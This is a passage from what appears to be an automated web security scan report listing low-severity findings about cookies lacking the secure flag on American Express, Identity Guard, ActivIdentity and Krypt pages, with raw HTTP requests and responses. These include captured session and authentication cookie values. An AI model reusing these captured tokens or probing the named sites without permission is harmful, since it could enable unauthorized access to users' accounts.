Location: https://online.americanexpress.com/myca/logon/us/action?request_type=LogonHandler&Face=en_US&DestPage=https%3A%2F%2Fonline.americanexpress.com%2Fmyca%2Facctsumm%2Fus%2Faction%3Frequest_type%3Dauthreg_acctAccountSummary%26us_nu%3Dlogincontrol%26inav%3Dmenu_myacct_acctsum
Content-Length: 0
Set-Cookie: NSC_f3-nzdb-vt-bddutvnn-vt-5655=ffffffff97a3d1a645525d5f4f58455e445a4a42861c;Version=1;path=/
Cache-Control: no-cache,no-store
Expires: 0
Keep-Alive: timeout=15, max=91
Connection: Keep-Alive
Content-Type: text/plain
Content-Language: en-US
Set-Cookie: sroute=621677066.58148.0000; path=/


11.61. https://online.americanexpress.com/myca/logon/us/action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.americanexpress.com
Path:   /myca/logon/us/action

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /myca/logon/us/action?request_type=LogonHandler&Face=en_US&DestPage=https%3A%2F%2Fwww99.americanexpress.com%2Fmyca%2Fusermgt%2Fus%2Faction%3Frequest_type%3Dauthreg_PPLogin%26Face%3Den_US%26lgnsrc%3DPP%26REDIRECT_URL%3Dhttps%3A%2F%2Fwww152.americanexpress.com%2Fpremium%2Fcredit-report-monitoring%2Fenroll.do%3FSC%3D%26Face%3Den_US&Face=en_US HTTP/1.1
Host: online.americanexpress.com
Connection: keep-alive
Referer: http://landing.americanexpress.com/v2.php?type=v2&gclid=CNqttZH1tagCFQbe4AodEirYCA&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1303676103708679

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:27:45 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Expires: Sun, 24 Apr 2011 20:27:45 GMT
LastModified: Sun, 24 Apr 2011 20:27:45 GMT
Set-Cookie: NSC_nf3-x-vt-mphpo-c=ffffffff97a3d0fb45525d5f4f58455e445a4a4299f9;Version=1;path=/
Keep-Alive: timeout=15, max=31
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: sroute=957221386.58148.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 39093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">



...[SNIP]...

11.62. https://online.americanexpress.com/myca/shared/summary/UMS/images/us/generic.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.americanexpress.com
Path:   /myca/shared/summary/UMS/images/us/generic.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /myca/shared/summary/UMS/images/us/generic.jpg HTTP/1.1
Host: online.americanexpress.com
Connection: keep-alive
Referer: https://online.americanexpress.com/myca/ocareg/us/action?request_type=un_Register&Face=en_US&DestPage=81294+a%3Dbc58b4f6d9f9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1303676103708679; NSC_f3-nzdb-vt-bddutvnn-vt-5655=ffffffff97a3d1e045525d5f4f58455e445a4a42861c; NSC_nf3-x-vt-mphpo-c=ffffffff97a3d1e545525d5f4f58455e445a4a4299f9; JSESSIONID=0000z5WV0GvXASukTy2upqG-lc0:14ia6c7a4; MATFSI=IPCFSI::true~BBV::~; NSC_nf3-x-vt-pdbsfhx0-b=ffffffff97a3d0fb45525d5f4f58455e445a4a42be8b; sroute=655231498.58660.0000

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:54:09 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 15 Sep 2009 10:36:03 GMT
Accept-Ranges: bytes
Content-Length: 22023
Cache-Control: max-age=864000, private, must-revalidate
Keep-Alive: timeout=15, max=17
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: sroute=705563146.47873.0000; path=/

......JFIF.....d.d......Ducky.......7......Adobe.d....................
...
.    ..    ..................................##########...............#################################################......%....
...[SNIP]...

11.63. https://portal.actividentity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://portal.actividentity.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: portal.actividentity.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303674298.1; __utmc=262184092

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:43:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: portal_=deleted; expires=Sat, 24-Apr-2010 20:43:53 GMT; path=/; domain=portal.actividentity.com
Set-Cookie: portal_hash=deleted; expires=Sat, 24-Apr-2010 20:43:53 GMT; path=/; domain=portal.actividentity.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

11.64. https://secure.identityguard.com/EnrollmentStep1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /EnrollmentStep1

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /EnrollmentStep1?storeId=10051&MID=44929 HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: http://www.identityguard.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; JSESSIONID=0000q-nYx1Keu7bJfsO0pBizt3b:14glhsrp2

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:11:05 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_100000002780007=100000002780007%2c%2b4MSTzQJvaA8A8lIngB2TvNDsOs%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10051; Path=/
Set-Cookie: WC_USERACTIVITY_100000002780007=100000002780007%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvYWpB2Z0TxZP72J2%2bhqWebpCtzwntQf6ifTPmCGzIYQdzgIAJGNdk1sqGsL2SFJbu2V%0auLDso7SoXCRHG3bmVho9SL71SKXWL3hyWVeizZEkFb0Qg%2ba8nNJxhZkTHBXdwRyvF8M5yw11RaqT%0aIMzKInFF; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 77221


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<!-- Start of JSTLEnvironmentSetup.jspf -->



...[SNIP]...

11.65. https://secure.identityguard.com/EnrollmentStep1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /EnrollmentStep1

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /EnrollmentStep1?storeId=10051&MID=44929 HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: http://www.identityguard.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; JSESSIONID=0000q-nYx1Keu7bJfsO0pBizt3b:14glhsrp2

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:01:06 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_100000002779999=100000002779999%2cJUzxOb61NxaLz%2bgbZ1Ro3ggcxR4%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10051; Path=/
Set-Cookie: WC_USERACTIVITY_100000002779999=100000002779999%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvYV5lF81xxnGdIw%2bl67KlnwpiaV4dm5kxr6RupgpYiYzej4qMfr2800fXVLG6wog7P5%0aK21Gyauwu09mpmZhZ4vP36C00p317MJMJzNFxLjHfFcZX48t8T07DRFWuTmeY%2bqHjX9%2bVZQs5rb%2f%0aTds7a7PW; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 77221


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<!-- Start of JSTLEnvironmentSetup.jspf -->



...[SNIP]...

11.66. https://secure.identityguard.com/Logoff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /Logoff

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Logoff?langId=-1&storeId=10051&catalogId=&URL=INTXEnrollSessionTimeout HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: https://secure.identityguard.com/EnrollmentStep1?storeId=10051&MID=44929
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; JSESSIONID=0000q-nYx1Keu7bJfsO0pBizt3b:14glhsrp2; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_100000002779999=100000002779999%2cJUzxOb61NxaLz%2bgbZ1Ro3ggcxR4%3d; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_100000002779999=100000002779999%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvYV5lF81xxnGdIw%2bl67KlnwpiaV4dm5kxr6RupgpYiYzej4qMfr2800fXVLG6wog7P5%0aK21Gyauwu09mpmZhZ4vP36C00p317MJMJzNFxLjHfFcZX48t8T07DRFWuTmeY%2bqHjX9%2bVZQs5rb%2f%0aTds7a7PW; cmTPSet=Y; 90226925_clogin=l=1303664423&v=3&e=1303665347307; cmRS=&t1=1303664423903&t2=1303664427096&t3=1303664447306&lti=1303664447305&ln=Map&hr=%23&fti=&fn=contactInfoForm%3A0%3B&ac=&fd=&uer=&fu=&pi=Enrollment%20Step%201&ho=data.coremetrics.com/cm%3F&ci=90226925&ul=https%3A//secure.identityguard.com/EnrollmentStep1%3FstoreId%3D10051%26MID%3D44929&rf=http%3A//www.identityguard.com/&cjen=1

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 17:16:09 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout?langId=-1&storeId=10051&catalogId=&ddkey=https:INTXReportDisplay
Set-Cookie: WC_AUTHENTICATION_100000002779999=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_100000002779999=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10051; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPm3h%2bUPrQaInKO%0aI5%2fwRlx%2ba4dEb3pz9ivhZXzn2hnp%2fesOoSY5sMac8iFFBOVsfb8fZGV6VEVdPKs%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[17541295%3atrue%3afalse%3a0%3a1la40HRl5AsYnB6LdDH1p7zJDyc%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26null%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en-US
Content-Length: 0


11.67. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/INTXEnrollSessionTimeout

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/INTXEnrollSessionTimeout?langId=-1&storeId=10051&catalogId=&ddkey=https:Logoff HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1?utm_medium=affiliates&campid=14&mktp=Next&cenhp1=1&hid=205557652&c1=394717213CD1&c2=CD1&storeId=10051&krypto=c69BtQbpODM%2BkfRwmoM2j7tndSfDT2UaaPm2KXJn1QDOPZVmPOBCRk5LxUDE%2BNzQsFGcO7H6PRgZ%0AUzRCzSqr4gFyuz56UYEGYcFlKxEr2ITR%2B3HMJo6H08xc7TfuUQ4pZgtNaIfyJyKqGIBnQwZn9tbt%0AjBT335psUfZLzpYUDpIyQZV9DE9ItepY03Kz3giu61wsI%2BkhJaxQW5vfuJAl8g%3D%3D&ddkey=https:EnrollmentStep1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.7.10.1303614598; JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; WC_SESSION_ESTABLISHED=true; cmTPSet=Y; 90226925_clogin=l=1303614597&v=1&e=1303615926175; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26null%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:32:53 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 8623


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<!-- Start of JSTLEnvironmentSetup.jspf -->



...[SNIP]...

11.68. https://secure.identityguard.com/webapp/wcs/stores/servlet/Logoff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/Logoff

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Logoff?langId=-1&storeId=10051&catalogId=&URL=INTXEnrollSessionTimeout HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1?utm_medium=affiliates&campid=14&mktp=Next&cenhp1=1&hid=205557652&c1=394717213CD1&c2=CD1&storeId=10051&krypto=c69BtQbpODM%2BkfRwmoM2j7tndSfDT2UaaPm2KXJn1QDOPZVmPOBCRk5LxUDE%2BNzQsFGcO7H6PRgZ%0AUzRCzSqr4gFyuz56UYEGYcFlKxEr2ITR%2B3HMJo6H08xc7TfuUQ4pZgtNaIfyJyKqGIBnQwZn9tbt%0AjBT335psUfZLzpYUDpIyQZV9DE9ItepY03Kz3giu61wsI%2BkhJaxQW5vfuJAl8g%3D%3D&ddkey=https:EnrollmentStep1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.7.10.1303614598; JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_100000002776876=100000002776876%2cFk1AcrNuu6ExBXgm0keyztjSFMM%3d; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_100000002776876=100000002776876%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvZN%2blny%2bAWBcNcgTgEYQTAn%2f5Qm%2ffFEPfXIv63cZlJiaE%2fMDdSGnMW%2fXgGZuQixVSag%0aE8V2RkfRemX3JuHpY1f44dEyBWljB5jE7W5JcSzsAjumrm2fXxlhGQX6XF9b5f6GKyQ%2fwj5G0ndt%0aS7FTQyrm; cmTPSet=Y; 90226925_clogin=l=1303614597&v=1&e=1303615926175

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:32:52 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout?langId=-1&storeId=10051&catalogId=&ddkey=https:Logoff
Set-Cookie: WC_AUTHENTICATION_100000002776876=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_100000002776876=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10051; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26null%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en-US
Content-Length: 0


11.69. https://secure.krypt.com/active/cart/cart-image.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /active/cart/cart-image.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /active/cart/cart-image.html HTTP/1.1
Host: secure.krypt.com
Connection: keep-alive
Referer: https://secure.krypt.com/order/customize.html?index=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:38:14 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:38:19 GMT; path=/; domain=.krypt.com
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Content-Length: 1051
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/png

.PNG
.
...IHDR...............'n....tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.70. https://secure.krypt.com/cart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /cart/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cart/?customize HTTP/1.1
Host: secure.krypt.com
Connection: keep-alive
Referer: http://krypt.com/dedicated/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
